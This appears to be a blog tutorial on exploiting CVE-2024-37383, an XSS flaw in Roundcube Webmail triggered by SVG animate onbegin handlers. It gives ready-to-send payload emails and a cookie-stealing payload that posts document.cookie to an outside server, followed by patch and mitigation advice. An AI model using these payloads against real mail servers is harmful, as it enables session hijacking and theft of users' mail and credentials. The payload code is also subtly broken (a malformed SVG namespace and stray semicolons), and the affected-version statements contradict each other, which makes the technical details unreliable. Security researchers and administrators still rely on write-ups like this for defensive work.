CVE-2024-37383 - Exploiting XSS in Roundcube with SVG Animate – A Hands-On Guide

CVE-2024-37383 is a newly identified Cross-site Scripting (XSS) vulnerability affecting Roundcube Webmail up to version 1.5.7 and 1.6.x before 1.6.7. This vulnerability stems from improper sanitization of SVG images, allowing malicious users to sneak JavaScript code into animated SVG elements. If you're managing a Roundcube installation or just interested in web security, read on—you'll learn what CVE-2024-37383 looks like in practice, how to exploit it, and how to protect your mail server.

What is Roundcube Webmail?

Roundcube is a popular open-source webmail client used by thousands of organizations for accessing mail over the web. Its user interface is built almost entirely in PHP and JavaScript, making it a prime target for XSS vulnerabilities.

What Makes CVE-2024-37383 Special?

Most XSS vulnerabilities in webmail clients rely on manipulating HTML or JavaScript directly. CVE-2024-37383 leverages SVG images—specifically, attributes used in SVG animations. Modern browsers render SVG elements and sometimes grant JavaScript-like abilities (such as running code on animation events). Older (or poorly validated) webmail software can mistakenly allow these attributes through.

The Anatomy of the Vulnerability

Affected versions:

Roundcube 1.6.x before 1.6.7

Vulnerable component:

HTML message viewer (*rcube_washtml.php*)

Exploit vector:

Embedding SVG with <animate> elements using event handlers like onbegin

Impact:
- Allows execution of arbitrary JavaScript code in the context of a user session (stealing emails, cookies, performing actions as the user, etc.)

Send an email with the following SVG payload in the body

<svg xmlns="http://www.w3.org/200/svg"; width="1" height="1">
  <animate attributeName="foo"
           from=""
           to="1"
           onbegin="alert('XSS by SVG!')">
  </animate>
</svg>

The <animate> element features an onbegin handler, which is a standard SVG event attribute.

- When the SVG is rendered, the onbegin event triggers, executing the JavaScript code (alert('XSS by SVG!')).

2. Bypassing Filters

Roundcube tries to filter dangerous HTML attributes and tags, but in affected versions, it fails to block or properly sanitize the onbegin attribute within SVG <animate> elements. This allows the script to execute in the recipient’s browser.

3. User Interaction

- No interaction needed: If the webmail preview displays the email or the user opens it, the XSS code runs automatically.

4. Doing More Damage

Once you have code execution in a user's session, you can do much more than pop up an alert. Here’s an example:

<svg xmlns="http://www.w3.org/200/svg"; width="1" height="1">
  <animate attributeName="foo"
           from=""
           to="1"
           onbegin="fetch('https://your.server.com/stolen?cookie='; + document.cookie)">
  </animate>
</svg>

Below is a ready-to-send HTML email PoC for a test Roundcube installation

Subject: Test of CVE-2024-37383 XSS

Body:
Hello,

This is a demonstration.

<svg xmlns="http://www.w3.org/200/svg"; width="1" height="1">
  <animate attributeName="x"
           from=""
           to="10"
           onbegin="alert('XSS achieved via CVE-2024-37383!')">
  </animate>
</svg>

Best regards,
Exploit Tester

Is My Roundcube Instance Vulnerable?

If your server is running:

1.6. through 1.6.6

then you are at risk unless you have patched this specific vulnerability.

How Was It Fixed?

According to the official security advisory, Roundcube updated its HTML sanitizer to block dangerous SVG animation attributes, such as onbegin, onend, and others.

Fixed in:

- 1.6.7 Release Notes
- 1.5.8 Release Notes

Mitigation and Recommendations

If you’re an admin:

Upgrade to 1.5.8, 1.6.7 or later ASAP.

- If you cannot upgrade immediately, consider disabling HTML message viewing, or use a web proxy/WAF to filter inline SVG from emails.

If you’re a developer:

Always sanitize all SVG elements and event attributes.

- Use libraries like DOMPurify if you handle SVG content on the client side.
- Test your input sanitization using XSS cheat sheets.

References and Further Reading

- Roundcube Security Advisory (June 2024)
- CVE-2024-37383 at NVD
- GitHub Issue/Commit Fixing the Bug
- SVG and XSS: Why It’s Dangerous

Conclusion

CVE-2024-37383 is another reminder that even niche browsers features—like SVG animations—can harbor dangerous security flaws. Monitoring security advisories, updating your software promptly, and understanding how seemingly harmless features can be abused is key to protecting users. Stay safe, and update your Roundcube today!


*This post was crafted to help webmail admins, developers, and security professionals understand and mitigate recent XSS risks in Roundcube. Always test security issues in a safe environment!*

Timeline

Published on: 06/07/2024 04:15:30 UTC
Last modified on: 07/03/2024 02:04:16 UTC